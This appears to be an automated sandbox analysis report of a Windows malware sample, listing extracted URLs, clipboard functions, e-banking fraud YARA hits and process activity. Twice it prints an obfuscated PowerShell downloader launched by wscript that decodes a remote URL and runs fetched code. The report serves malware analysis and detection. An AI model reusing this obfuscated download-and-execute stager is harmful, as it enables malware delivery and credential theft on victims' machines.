Source: bhv9E46.tmp.10.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1877272550.00000112E6A52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: msiexec.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: powershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://www.office.com/
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0041183A OpenClipboard,GetLastError, 10_2_0041183A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 10_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 10_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 12_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 12_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR

System Summary

barindex
Source: Initial file: Call Agrammaphasia.ShellExecute(Silverers, Chr(34) & Nonpardoning & Chr(34), "", "", Interne)
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00401806 NtdllDefWindowProc_W, 10_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004018C0 NtdllDefWindowProc_W, 10_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004016FD NtdllDefWindowProc_A, 12_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004017B7 NtdllDefWindowProc_A, 12_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00402CAC NtdllDefWindowProc_A, 13_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00402D66 NtdllDefWindowProc_A, 13_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7EC022 1_2_00007FFD9B7EC022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7EB2BF 1_2_00007FFD9B7EB2BF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0446F340 3_2_0446F340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0446FC10 3_2_0446FC10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0446EFF8 3_2_0446EFF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC7B5C1 8_2_1FC7B5C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC87194 8_2_1FC87194
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044B040 10_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0043610D 10_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00447310 10_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044A490 10_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040755A 10_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0043C560 10_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044B610 10_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044D6C0 10_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004476F0 10_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044B870 10_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044081D 10_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00414957 10_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004079EE 10_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00407AEB 10_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044AA80 10_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00412AA9 10_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404B74 10_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404B03 10_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044BBD8 10_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404BE5 10_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404C76 10_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00415CFE 10_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00416D72 10_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00446D30 10_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00446D8B 10_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00406E8F 10_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00405038 12_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0041208C 12_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004050A9 12_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040511A 12_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043C13A 12_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004051AB 12_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00449300 12_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040D322 12_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044A4F0 12_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043A5AB 12_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00413631 12_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00446690 12_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044A730 12_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004398D8 12_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004498E0 12_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044A886 12_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043DA09 12_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00438D5E 12_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00449ED0 12_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0041FE83 12_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00430F54 12_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004050C2 13_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004014AB 13_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00405133 13_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004051A4 13_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00401246 13_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040CA46 13_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00405235 13_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004032C8 13_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00401689 13_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00402F60 13_2_00402F60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
